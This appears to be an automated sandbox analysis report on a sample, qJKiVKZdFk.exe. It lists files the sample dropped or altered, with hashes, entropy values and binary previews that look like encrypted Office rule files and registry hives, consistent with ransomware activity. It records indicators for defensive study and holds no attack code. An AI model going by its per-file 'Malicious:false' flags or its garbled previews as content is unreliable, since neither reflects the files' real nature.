                                                                                                                                      Size (bytes):1716
                                                                                                                                      Entropy (8bit):7.894351732869863
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:az8tdhjyI7O9ucuHPniuWgfUsfckSpxX/oHKbA2D:JtdhyrucuHPnNWoUCHExX/Uxu
                                                                                                                                      MD5:86C0D4DDC465758AAC1D171188CDB7A9
                                                                                                                                      SHA1:CE9FD674D3E9801AD4060FB5E22F591D25A57962
                                                                                                                                      SHA-256:3B501523851EAB6F3835211E02304D5B2A6B67668C9B9E0671DD2CAB4C62399B
                                                                                                                                      SHA-512:5D5C3E023E9C69AAD91442DCACBD10BC3BE53327EFE725BFDF421D0634F92F6C2A9ECA6E0DC4DB80ACD0A4797FB2CA2A06D22AE8DFB51DCAA777FF49FE63500A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..m ....{j&Vg.i...42.N....XH.X.<.!..".f..)tk_kx/.r%i...h..*%j......&...T.Vxd.E.@.>E.t....M..Q.T..\..._.3..h..B......)...O .U.<..f}........j..3. ..4.SU.8b.^P...yb..r".0..}d.q...?...)...'...x'.8 ..........Y....E.I-.K^*.m;|.....T~.$!...%.(._.....Y/..i]..j.,.Rzm.K,.1..!,..&2...>r..w<....>.|..~l..d.............@..g%..9.....EJ...HZ.j...z.P.....Y....D.&.WGN.4x}.3..6cS.9.T..)..zc0h .f&...?C_...z..0.y...../%.............2X.....(..:u..s...fH.....4.....0...S.`..]c'...un......u...y;....}uC3.vS...c....0.G.UX.@....._..$Q....b.e.t.......RR...q.*...e..$.x..71.......%:b...>{......>lx....i._.1..K......x..-~.ZD...#:6......U....J..|./...."Ca....#...k....`R...8~..T.<...^?bD.....\1.5....f .....!p'..U:..z.n......Q{...p......{...>.r.{.s...eY.^...I.P.,..V..\.R...6`:2E./.H.9(..1..la.....!.....q6.r1.....xY........(p.b....H.$.}.i.|G./.9..sZ.....<..'cR.(.&...(i.h*.Jl..|......../.I......5u.8M..&.%=.._~U.(.e..r..E.ii.L.b4>.....Rd{=4?T/....a.e...K..L

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11834v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1737
                                                                                                                                      Entropy (8bit):7.885481024699922
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:MoxJ11i57LWfcwOL2nt+vpBQRmr118v9kwdGAB3/Z74ID:xRA57L+cNant+BKmrEv9RG0pX
                                                                                                                                      MD5:991FA4D39C624E15E02D3692A25E1487
                                                                                                                                      SHA1:4337E5014D26599A57E8A67EF059ECC4F1DEA930
                                                                                                                                      SHA-256:565F9A79A89483CB3CCE697F69245156572A72C3A6273C49AF1B30FC2B9700D6
                                                                                                                                      SHA-512:172B7B03441BF30F65C18EAFB1AC0CA89327EEE6112DAA6A17921968D46A9029AC60884A3C5EE44CA6CF570D55EB056BEA03ECAF6679634C6F90047C63394599
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlT.0..H.N<..7c.(.5.~...}.5..I...T...bo.}....(sp.n.qDth^.......D<..o....^"l.'.R.ek@k."..H.2...R9..q.b.:N.O...............m.7af..D...q.J....S6$..f..f..x-..`.[~........_#.#.?GA.5N..h..}..y..2.{a......h..{..nVXT._#.....O`Q......;k.7..tUj.uU.l~.,..st.e0..x...|...{.8.H....8.....2.P.#h.=.uY..`..8..e....cNq:F&.x..r.rp/.f:P..u$.u'1.7.?..)....Z...G....Wj.%......?.$...k.A....DsxeL...xG....=..(mq@..X..E..k...._......!!..[k.z..x.(......f...>.O.,..o.<....!f.K.#..[N.Q.O.[.@.\r....}^.|.=_..,t7.E.....y.n. ..<.E.......z.22.^.,....C.ps......A...k..?.....F.B..>/.T...R...h.....oFq...L...q.+........<(.b.....n....W|.Ob.<B.....6....Ku.R....WR.6....!......G..l.z.U[.......,<....i...o&.Z^..~.;\U.."..>....1u../.c.....k.........H@c....:y.V..m.....)..~...5...%..]|fA*4...(....1.......0.Cc[@....a.\.....`ELy_!..g9...:y.1E%g..).^...[ow..a1.4bm7.?...@6$.o......u'....?T]+@.`..}......b.`.>+..]O+....}%z1..I)d.....$......%..G.G....u.E|.^Z_.J...t.M...^........f...sY.-_..*.(..'P.}

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11882v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1448
                                                                                                                                      Entropy (8bit):7.880447084395893
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:mBwHej4wUTDyCLVL6uj7HTg/RsjX79wLoJhu4Y29OkmZ2liNX5qTtIdnIZbD:mCxwUTG8VL6ADMujX7nJM21NMN4TydnS
                                                                                                                                      MD5:5BF9A0703A0E2CAEE348B256AEEB356A
                                                                                                                                      SHA1:67786F2A99B327C662D5D8DA12C89B9921BC5CC6
                                                                                                                                      SHA-256:5CF6EF16C041E7B8EF0F5F28E0D2666E482F950B15CBF55DC638F3D522E3A2F5
                                                                                                                                      SHA-512:8CE56E4C6600D63A64F59F9D0C6EC755D5A28A4E99B8A2CBD09B5F0DED424753496BB94853C9E3A0540BC17478C32E3C1C66354A3DB5CDBCF2C33D4C65F4FF14
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.SN\..{..!%{...6...B.....%.....7.V..&..?.._.....FJ,../.<'.qD..h(..m.K..5....w$.....0...p..3............4.|..V.8..>.vd"p..5...6...N...0.x...`...W.<c?g.....G.R...be.UN.4L......ok......-F...nB.G...OtGq...[..b,....$...<.j.!dz`.~..V..&.:..............^4,c.OU/XN..<....S.M.....Uk|.... ....+.`.qg....U..[.....Z.o.#:z.Ym..:...V.H.............J3t.9l...{9_....@..-V..X......vO......G0d.K.....Y..|..Lf..w.(..{......QB.O\.]....8..vO..NO?.K.o.<. ..#......x?._..s. ..X....w.]..>p...........8[.u..._.r,uZ..i*.. ..$5o7~.0.......=,.~`.....v. .].<...r..G..../..Q.4.%...<...!U-j.....;".1.U...G-p=.B.6..._G!I.Z.zT.P.$.N*..c....~.....~f.n.e].a0&=..].o)..Zf.w...c..9......@.O~6u..k.b.~.Z..|.N...(.....Xn..Li..I.yD.....kSQH.t...e...HAO.X.$.......bMmJZNS..a.R.hW{.....{..$.3......^...N.+.C\.BA'.u/y)7......I>Pf.....@...f..w..o.^..t..........>....%...8.Q.z3.&3[.!..._.T..~.`....Yv.r-..^S.q..F...z.S7..4Q.r.O..>j.x..$....'y...Z!..4...R.EFR..-...G.YH.Z?.....).5I../...g

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11890v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1419
                                                                                                                                      Entropy (8bit):7.866222656685108
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:PEavnNa9+31jlBwb1oMZyjA8Lj73pqHlRnEjZZA/Cu8qsIR4rc3bDbD:PNYs1jkRnMrjYHleZGz4r+XD
                                                                                                                                      MD5:BB143903F01EDF5C7F73833246168363
                                                                                                                                      SHA1:3BF5CFCE8B0B9C6677AE54201F53C61BA4D089E6
                                                                                                                                      SHA-256:2F8F0AF1C89C1167E38B3650DC45C7B065588F11668DF4AADB5DCDC1860D30CC
                                                                                                                                      SHA-512:5EE8219AD506258BA7F1596E43BE71864A88B5D650F9BBE899A9B5D3200072D185184DE5654E7ADA1EAF8B58D34486EFF357CA571A4EA31C5610E3B53B41E25D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.'..q.t..).`..g.ut..4.,[W._w.....'.b.(-.~......NR3 $.....L.$..w.(.....>@0c<..X..-...i.oNk..U.L...j1.......!..-K...a..O......jw......0.]##.....d...3:9..7. .."M.].k..n...c.N...-g..\.9....y"G=......U..~iv......pj"...J.f..ue..........B...Y.....H.....\c.....e1bT...{"?...d.x....u...!6.=.#.y.~.....s..v.rS..oPlE..N.......U+.<{...1............'C......|..$.A....N.}..|P_...<...].#.zAT5.Yf._....3.qm..].........~+..I(.T..M`......K.c.^..F6F..x<.<.@i...~#.3`...S...0.|.....A...#.~.\.>1=...$t.:.....e..$I...~..m...b.#..;.%$J.l..|..#...........]..O..S.JN.1(.tm.=..p..s71)O.&w(.;.l..m...Fc|A.A..xve.<...+..0./4...c.eB....(......1.F.;.W..+?y......w...-..n........<.":?..].k...e...z....5d.G...h.x.^.xu.vI...2..J.$............h..n.9m. .c)..2dSi`_...1...LgI.S..}.:.../..(L..@..".V.#..i......::...x_.|j....O."}..[..Z.z........(.U.Nx....t....E0.iz...0d.^lA!.@..QJ..".f..f?c..1.W.t.-...dL.b..!..nP...+.[..C.<....e.L...N...-.P.......&..zp...SB.K.vXb...A5i......f..|..sq.Gy..\.bU......

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11930v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1546
                                                                                                                                      Entropy (8bit):7.870408137107182
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:eY/bKuF89p9X6mJKYUIezenXLN0+XwvfaE+NFKjjQzwbw5iwSc1M/C+HW8HpvbD:mB9TqmwOx0Vvy/U0zNSCMqwH5D
                                                                                                                                      MD5:4AB5F961194C7C5715DF630F27FED747
                                                                                                                                      SHA1:8DA17C795E14DB9986828F57A0E7468FE97F91FA
                                                                                                                                      SHA-256:F41A34308167DD41A84990A94A07D0AB795F1390AB4BB4164534BE5E186C0262
                                                                                                                                      SHA-512:DECD4AFB1B54419921E3DE3E0C050A5F84B95A722F7A45BEC21D8E356E8FEB278941E89FB6C079C038DEA486EADFF3A3E522991C1392F38918CA32379BC031A1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml<.T....H.!+w...d.C........zV.a.p.B...~/..+.<q.By.d....j....8.33S...h}.~....Z..v=..-9<..../.y8....l.`.f..f..#..w....NcW.S..."`_a.s*:.*D.K........._....+..5IWX..N.#T....A.f...Y/+$.o......Q?S...2..Gd._.9.D..2.> ..Rn.v...|6......X.N.cU(.jT$h5@....[.$..^j.Q.EK...u7..|/..|&8.........A>}.tf#....,]q......3(.B..2....=....5.jQ..~x.*.:...u....D..l......7]....vv.*.B....~F...]...O.r.'..LF.....=..J.jL..3{b.5+hN....F..8........0j@....@|..9.:.d. ..).. L.aZ..u:..R..L.Ox..>v..N..g."...c..{G./.J.]l..#"};..L.N.....mY,3.s.....;.9r"......U.{...4.../U....9........{.[.7.....N....V.F\...Jx..\. .~....Y..'t.i....... .....;..b9^.......P.....R.!....[.~|>...8..F.`.>~J.......<<..RNP.1._T%...a^...][j\G..N(...K..i....a..?.HA..{...m.a._...[..dKC...!...U...t&.f..#.X..s.....c]..?..w...1.2...].R.0.....XuZy..evI..P...d..R.Q.Dg..xx.>q.)./.....[....S....\uEP+c....0.(.....K.}.../&o.>1i....s....4{..#Sq.F...jL...=.).....YB..s.^..t...+..E.4..&..~I......U.5y...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11931v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):903
                                                                                                                                      Entropy (8bit):7.759818380219885
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:s1w7CFpfahwml1aLVwI6UFrrbusKo2G/z8pGPfGrls1bS1SDBw2xZsQ2ujfR6cSf:sHfBCf/19F5rlAS1sBRUQTjfcKQhbD
                                                                                                                                      MD5:10286C128BDD3728184929175B07003C
                                                                                                                                      SHA1:0E0731916768C72E1A351C0881D914B2D956A7D9
                                                                                                                                      SHA-256:D84D1A641501C0F616F6183C3FDED720CFF7F750480851EDE5D1F9D5E61CAF46
                                                                                                                                      SHA-512:A754F9FE59F78308B230D6CCC1142A003ED322D280FAC619372285440DBA547FF7DA85C3B3B36191CDE297DEB17A2B78D2095DBF09BA5783B09CB4E552DF9E00
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...nf...9......f!..4.....A..Hh1.x.IG...FN..*.V9k.b..UF....X.].P........~#..8v.../5....o.4....aN.%v...."....bUd..G.H...EY.;|.H..?b....gW9+.......:/..%...i|.!k.g.}.L.\L.X$;T...|..FLXx..j..'zB[..R.<W......}.....H...0...2T.....u.....s.8..e#.>.w.2.%..*..U....1.#.j.zdTa.({x...^..K>mC6....lxF]h.C.....3g.S......~.../..[7.5Z.d>.OL.%."X.v.Y.cg.B.Q4.f7.Z..iG..c...j.l..r.^."w:..b....4E..\.. ....F..-...zia...m.a...g..jL>..l...._tP/,.].0.@.x. ....sp-.u!.QH\..bf..@.+...w2..C....D..!..E.v)uj....7.m.?..;.\.8.^o.i..!.jv.6aei........Y...Iw.L.q.v.9.Y....y...m.O..G.k..f.b..Y.c..v..Y.V.!.G#.zLHmJ......:.9T.....e.6.o.-....73.k....Q..p..<.Rs=..X.`'0H..`...^+:%%.A.E..u..&...c.F..t._.`e..#..2..._6.Yv..........z..Y...om..K...X.=..R.n.h..3;......1......Y.x.......b.`z.B...!._........R...3.4W...@.r./#CG.Ef.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11932v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3566
                                                                                                                                      Entropy (8bit):7.946650865727512
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:UdUx8DWw8TxoXxYQxFMOQQ3deozbSUgKof4N3s4m:Ud/WwOxwxYQxFMFAdhbeQZI
                                                                                                                                      MD5:DCC61A6298CBF7D04E8FCFA21A0C9207
                                                                                                                                      SHA1:985885648078CA739E830277BCF74A8D39C2558E
                                                                                                                                      SHA-256:282F898616561DACDB008CBCF689748B674B98416A41C8F514B19ABEB0E40DB5
                                                                                                                                      SHA-512:F80C18606930140E535942953D88EDEA3135DEA6E159577E235A20D60824D647BAFF2A22CA226105FF6E5CDC2ADADE3522B3C7C3A483B91386546B6C4D327719
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..m.V.}w..!..>Z.)..l.d..........:.>...,..e[..?.........M.#\......A.R.P....n..{}...."..4bs.H.L.4.GBu%.....?.}.-|TGS.=To.xE49......m...H...0......{]@..v..s.B....k......W.H..|..[...i.|F.1F.&vMc....nN.U...S.QG.XL...Af.e...t..s.a.{..;.B...a..u..2%...@ ..i.....3.s........,...aXY.j.*.r.[P\.Wg)....$."+..,...H.._.I.. %*.L.{.y|..=...A.......@Z<..nk..P.o.O..c..H.._......`..QA.ar&rB.3......]..b.g..O..R.a`.$...........H...;.....~yJ.#..[..D.D}O....zPF..=..Kp...C.. s.hX.'.B..6...y..a...#+a....$.h..<...7.....z<..*../...p....Z...u..........H.XG@......h.....$..n..6.....h..O7..3....,.f....a...upz..<.I(..).m......a.Z..g...).wf.>...gZfM.1.`q'.K.......qc..] .q.w._.K.X.b.R'S.3...e.Z..[_u[..@[....8....Ox.U.$k.Wqa....xN.-F.DD#.m_R.....$.fhbN...T...,...@7.PY.L.4.....!.o..^.....=NX......)Z..e....oL#.*.H......_.4..B....>Fw..I....=?.l...W^-t.4...4.(...r...RR..t2.dT...`@@u..4jzDV.AZ..q+...$...h.9.D.L?.%rJ.. ...!HB:....,d....?~......D^..nT...`...^x..m+.X...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11933v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3677
                                                                                                                                      Entropy (8bit):7.9418119434952965
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:8o1eaWu+sWW3FK3twT+HH7y5yZmdVBbBhTCxlJIB4DVW:3ePuQke7NmVBtgIx
                                                                                                                                      MD5:0F92841CB667110BE368AFC6F3E11F2E
                                                                                                                                      SHA1:BAD5B9FDD36B718D1EFEA4E526CC4473663A065B
                                                                                                                                      SHA-256:7F505AB5F7DB16416F6FD7A94D5E7E6EBC80D3A419D9BE69AC405F79D1A0FB04
                                                                                                                                      SHA-512:EECE2FED991E4001A1DE6E0EDED6D3C6D4BC723D7D92EF1BEEC952803745A94BC03E4EF21C7DA55A1496E4474AD07B150870FDBFCE02452ECFE531404D815CD1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml|..q.X....aF.\...B."v..G.fJ{.p{......7rJ[..0U......Nw..0Jz.m...v.A...h..E..Y....g...B.)..1a....cF.B.D.W..@.*#..b.J(...%..e.......J..C..Y#.^....5....6.;g")vI...@K.X.?.....|..m....m...s<f..Rq..F}..2...W.Ay.A...z..3P...O!;.....+....].,q?.t..........d...........%Qr..U.[#.Yq....0.m.\[.&..2BO..u.cL.5t..v..].x<jk~F".UQc%.j..\C.~..?..D.3..dff._..\..J.g..-..Q.p....n......q.n~..=.)!.?...j.c...2...p.C:....%W/M....*e....p>..+..3.*P.jP...#J.3.Q....r....z.^2..Z.(.. B.5.sX.+c.C..T.C..2hi.V1..1'.....Lu..t..D~..H....,.*.....&<.........e...1...W.H......C-...i..G..2.....!.i..5V1>.f...8...Dy..4S.h.s....U.8;.rG=1.e.^.... .~..w.._OM.....ZZ.^\'a..\T..~...#a%...c...u...N..C.l. 3..j,V....*.... f.( M.M.(;8...U.<_..P..... .O......."r..Q..Z..@.u%..........J.[...1........I....k.`.V.y..0e..wh9.1.....N...F.t........D....G.....+...>I....J..bl......G2.DP..^.....xx.{....>..0......I8 ...e8k.B......Z..CS.......$Tq.j...>:.w..jc.S..$.....Z.....j......|..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1353
                                                                                                                                      Entropy (8bit):7.860939471295033
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:YMSvuROu6cLrsRlmBE7jNBel2qX6N49o2iLKOd1BmLIo7dX7KSCLUbD:Y/QyOrsRlX7je2q+bP/vmL1dX7++D
                                                                                                                                      MD5:C851F459A499D1FDED6326FCEBC7E2C7
                                                                                                                                      SHA1:ADC81B95F27555B3A271BDA66509B57CFEECF6C1
                                                                                                                                      SHA-256:7ACF023149CA4B7651DC1B9AC20FC6328ABE1440839358C779811A3FA782513F
                                                                                                                                      SHA-512:F45C51C7AB37A731B4CBBA19030857C16EE46DD6C1F0F1F7B722E2A6144450CC87BBA4B370FF7A8EF2C247C652DE82A45D7E0C9CA9DB8A61ED470C57FA702E20
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"Rec.e.{...%t...O..9.s2..U.....+?.%.W..&LQD..U.>L#D#*..!...l..X..^.r.>..at.].. \.s...!..BZ.....YU....`-q..r.%...G...L.. ..C..K*...,..k.|=....Z.........S....xhjj....y..U.j.&w`no.....:...j..`F$...C.R:EFr.f....m=........r.|..3.........N.0.BX._0/.kxZ...CD.7..).m.s....A0Q4L.......`.....>.s..{..m.._..y.....|...A..FJ.T....H@P.......?@.Ln}h...;qu......_.OO....n...p.f..5<..)...MMz....^..EC......V.r.=..~'..J&QOzTXu.LB..Z..S.\.}...fK.??.$..)Z..7...f".H0.f..jLo.i.}.W.....*d....x-..1,.V..k.%...z0.......1'...NjL......\I<.`.K.3..M...w_Z..`.3/...K)..=T.\0...X..*......@..p.\i.....fe/F...m.....chc(6.N....bI_.p..H..u..M.....).E.q.Q.=S...:.1........JF.=t.........,{'}(3..p..L...<.6>...5&....u.T...??..pm.P5.>...._.IQ.A..D..W......6R.... .....'/.%.I..f^..MT...bJ1.=:....47.......+0......\|.-.-..G..R.[.s...l-...f..=.....[K..5.....6...;- .Jp.9......t..>Z9.1W].A...p..8d.a=.T..\T.}..v.r.Z(..<..P0....... !..B.o]>.....p.A...S.......*..V...:...uY....!.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Windows\UsrClass.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3408206
                                                                                                                                      Entropy (8bit):4.763339561035251
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:dR/HmSc3XUooy1ncWOOctVMiA8DqkXci5QStPi5Uvf:dBGd3XUooyCOctVMiA8DqkXci5QCy+f
                                                                                                                                      MD5:C69D99BDCB3A1D08638C3ECBC06C6AAA
                                                                                                                                      SHA1:F227598779C45C8A4847A08A82DDC39F1B3A5C7B
                                                                                                                                      SHA-256:BC123C2303F61520E794FE96F285A091B42D0B6338FB51114E897A5EC5DB6FB4
                                                                                                                                      SHA-512:1A135F254A3B1AE127AA0599D5A27790F4DEF023A09C7F747BD36676FA5261B7DBF740A5189F98F0E3DBCF51DD2F95D89F7850845CBAC89424C4691AE8E79E34
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regfD...%.D.B..i.....g....}.j=..}b......w..."V.,)D>...i{.*..wG.......nWQ..e.[.$.T...k....1~.d..*)^....>...(=...kUI*.O.....Q.\%|..Po......$..1...I.......{A...@5......=...md.Z.m.|KWZ$.u...El...8........TY.r...&.......a..;..........\.n.2.;C..O.Tg..1..9D]];D[...;.e4U...r...x..._.rl.~.lx./.rS&Wr\w5J...t..`ihX....2...R+.o.....g.j...:...9.6....`YS}..Y..r.f....+..a..K..^@............[XO......&....!.yb..@w....O...!.zZR..(.q.....fB.*.1D...^V.7...psa...;.....3\m...0!....>..Hh.....{...A.5.......\..M. ..y......zg...Y.m..8e...|.S.{.B9[._%s%.m"X....C.U9...5P..g...,oK...c<u[.....Y~.HB...z.....c.5.e..q...\.w.&..xS&.Z..:t.]CB....od...........u.l(.+.a"A.........!G..$...(..k.@,.NL...k.u.V...qj87.y|0^.7]...`...h........G.Bi.G..{.k.....p.E.K..i.s.. .,a....j....8....d>.!6g....M..j....l<...@B..x...rF.....^^h!.7.DDKH\.. ..8...........S.f...!P.0...........9..n>c.{...W......;.q..?...3.XFnRIl.C#.w..E...$.......9.....I....~.....kL..$D..IpV...@..D2.K.h...C%...`g.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Windows\UsrClass.dat.LOG1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):865614
                                                                                                                                      Entropy (8bit):4.098373467353712
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:s6X0sy48YCN5Hi0Jwq412ZZJC6JZ2yfZyWeI4VTZZZZJC6JZ2kZZZJC6JZ2zrZZ/:V0U815i4wqv
                                                                                                                                      MD5:0AD0A7360DCFDD2ADB3681FE5D39B86C
                                                                                                                                      SHA1:3687D709884527DC52A3027BC5007BC0D8445A61
                                                                                                                                      SHA-256:13E150AFD32E50199D6120EADD4CC4EBDB282EBF2C0AD1637F3EEACA7734182C
                                                                                                                                      SHA-512:521967A83A8A7B9628AB55AABF24DF839DC19062B83DC50B8D8E0463CCF5B88069B9EC592607B1976B9AD44E6F5DEDD7889660E4F9D65D067C02B963AF4083AA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regfC...-s..O....7.J..xj..d...F..XZ..3...EW.".8...5.5.3.@L....[..|b.m..]......y..h..f.VY.?Wjh.t......9.S.k...3..T......Pp..A....d..5%Fj.......=..I.k`U{..V...\..4.E^.....10D..H!..,b..*.6.C.%O...Gm...Y..D.j%.r.S...D..\H.n.....=..,bx..6...i...J.*.Uti.........A..u...c.....9....l............g.t2.........AR~wAB>.kf4..N....k.2&WDtdF.......X.F{..%z.<.4>R.z.*.Cc.G..(.GV..[..(.c...a...LkK`.!B;.|...>y$..JS....i.Gc.o.u...t.n....R..@/l.D.^...".<(..j...{;.>.?..Suj.<e.K.. ....)z>..#h.fb9.e..o..9..I...T.p/.O..UB;.O6r......Y<(.....1.^.p.Oa....\+.X=.7.......#.t.?2...f\..3... lL.7...l.....I.....`ID..M.IA#.....?Q.g. Kt&86...d..A..........~oz..1 ._.1A./l.G.. .....K...^....$.;.=....#...r.h-H..b.;..O.mj.vC'..O...-.s...+eR..`.... y.;:;...../|]...,.$.(ubk.^......h(...cC.....f=S?..,.aN...y.T.%...Z..b.w....t.?..1.F...F.oh{P...U.....s'YQ.Az.@..0....!..=....j.......^.qs.dxh...9.c._.R.."....d..]X...a}d.D...so.D2e.|X....t2.4.+DI.I.2..4?_....j........6.......D.K.=).u.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Windows\UsrClass.dat.LOG2

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):865614
                                                                                                                                      Entropy (8bit):4.813923173865946
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:TZkmvVrsfUrd/9jvpxoJg26scpbJ6JZ2CM2C6JZ2h:TZkgrsfU59vpe5UJ6JZ2CM2C6JZ2h
                                                                                                                                      MD5:A860F3F6A29DD2A8EA0BFB26F29FA907
                                                                                                                                      SHA1:BE12331040C8447ED3CB129A03F756994283F048
                                                                                                                                      SHA-256:7F4C1A484A5BCBD6B45195F55D574FDED6D30F41DCFD07433D00263DBFFDA81D
                                                                                                                                      SHA-512:A2283C575FADEAE7B7749173F7B6F16C2EC5CA24D0D3928B73A29AD548F72F7C815AEEB973F9ED61A06AB5D9FD99E498FD2C8572B0A071F8AC6178973D93EA6A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf-e.rkcz.....9-]..._..%.................5fFQ.gO~,.....(.-.Z.....{...|.~&...J...\.....9U..P9.g...`Z...... .=..".<.`F.G;..HF.C...O.....,....5.9..f....d.q~..Kh.......~.h...k...M.;.0N!....m..+..y[....V.....G...+_h.*..,..v.[)+H.H...J...|9z...^?R..@p.XAE..)jI...Yy{.*6! e.b2..\.`f>...t"..p...y,$.r..."..$...i....mX..=g.M|..J......d;..@9..rb.u..}.J.oN...VHQ..4...$.M...^.....O.@..g...e5iE.Tl8gv~#.C.Z.])..4.+.$.E..0"_`uT....e.rK.li...!.....y.'....m....!....{...0v......T.P..y...S.b3...Ow..M..~m...)(.C.af9.Q.be..|..|.)rvp...zf..a&......O.9.T..k.$...)7...n.(.o.D...e........G.Z...;.V..0....Q.{4......3..f.#.iph........).{.z&J-"...:!.y....R.[...A......_J.._......o>...9-..6z}}c..h..:.O..Q..(brH.Q.{..|p.L.I8~..C.......I.....%.....n.|_.1.]PT..B.>.0.9..{...kU.{..B.....un....i....)....z.w.F.c..(..-e.....{./.,.`.9.O.....2<..o...JhG....2.6......."..s..p.2.D#..mU......_.MVia..M+..)od.s....}...t..2>*...<.A.._)...a.S....Z..g...=.2.y..g......N<7.....H.Ju\.."(.1

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\fluency\lm\en-GB\.config

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):561
                                                                                                                                      Entropy (8bit):7.534448039937247
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:Nk25vZTigqUjb8uvQCUD1BuKq7MtS0wdnMEa3dR7+ukIcii9a:N9vZTiObTUD1BuKqgtSfTaf7ZbD
                                                                                                                                      MD5:3067338CC8140301F5A5CEC102643755
                                                                                                                                      SHA1:521AA82DFB2032647C3C7713FE2A11C59F5A7844
                                                                                                                                      SHA-256:1B5DCE3B05598DD30C97D725DEE0A8348AD0362183C44CA522E2B665B93B05A0
                                                                                                                                      SHA-512:CF9A61A8C846ACA8237F52CB03ED24C75515CBEB3443C338018706673CEA4677AA9278599FA4AA8AF72245203FA02AFF7D3C276BE8BDF8A5D7C972AE179166C1
                                                                                                                                      Malicious:false
